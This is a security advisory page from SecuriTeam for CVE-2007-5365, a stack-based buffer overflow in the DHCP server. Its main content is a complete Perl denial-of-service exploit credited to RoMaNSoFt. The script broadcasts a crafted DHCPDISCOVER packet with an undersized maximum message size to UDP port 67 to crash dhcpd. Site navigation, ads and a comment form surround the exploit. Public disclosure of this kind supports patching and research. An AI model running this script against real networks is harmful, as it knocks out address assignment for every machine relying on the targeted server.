Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
SecuriTeam™  Beyond Security®  SecuriTeam™ Home  Ask the Team  Mailing Lists  Advertising Info  Blogs SecuriTeam™ in Your Inbox   E-mail this CVE-2007-5365 to a friend New vulnerability? New tool? Tell us	CVE-2007-5365 Stack-Based Buffer Overflow Vulnerability in OpenBSD's DHCP Server (Exploit)     Credit: The information has been provided by RoMaNSoFt. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    CVE-2007-5365 Details Check for CVE-2007-5365 Vulnerability Assessment and Management. Automated Pen Testing for 50 to 50,000 nodes beyondsecurity.com/vulnerability-scanner Exploit: #!/usr/bin/perl # DoS Exploit for DHCPd bug (CVE-2007-5365) # By Roman Medina-Heigl Hernandez # a.k.a. RoMaNSoFt <roman@rs-labs.com> # [27.Oct.2007] # Tested: Ubuntu 6.06 LTS use IO::Socket::INET; use Net::DHCP::Packet; use Net::DHCP::Constants; use POSIX qw(setsid strftime); use Getopt::Long; ### Default config $mms = 280; GetOptions ('mms=i' => \$mms); # sample logger sub logger{     my $str = shift;     print STDOUT strftime "[%d/%b/%Y:%H:%M:%S] ", localtime;     print STDOUT "$str\n"; } print ("DHCPd DoS exploit (CVE-2007-5365) - RoMaNSoFt, 2007\n---\n"); logger("Opening socket"); $handle = IO::Socket::INET->new(Proto => 'udp',                                 Broadcast => 1,                                 PeerPort => '67',                                 ## Hacked to work as non-root user :)                                 # LocalPort => '68',                                 PeerAddr => '255.255.255.255')       || die "Socket creation error: $@\n"; # yes, it uses $@ here # create DHCP Packet DISCOVER $discover = Net::DHCP::Packet->new(                       Xid => 0x12345678,                       Flags => 0x8000, # ask for broadcast answer                       DHO_DHCP_MESSAGE_TYPE() => DHCPDISCOVER(),                       DHO_VENDOR_CLASS_IDENTIFIER() => 'rs-labs.com',                       DHO_DHCP_MAX_MESSAGE_SIZE() => $mms,                       ); logger("Sending DISCOVER"); logger($discover->toString()); $handle->send($discover->serialize())               or die "Error sending:$!\n"; logger("Done"); CVE Information: CVE-2007-5365  Comments on CVE-2007-5365:  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®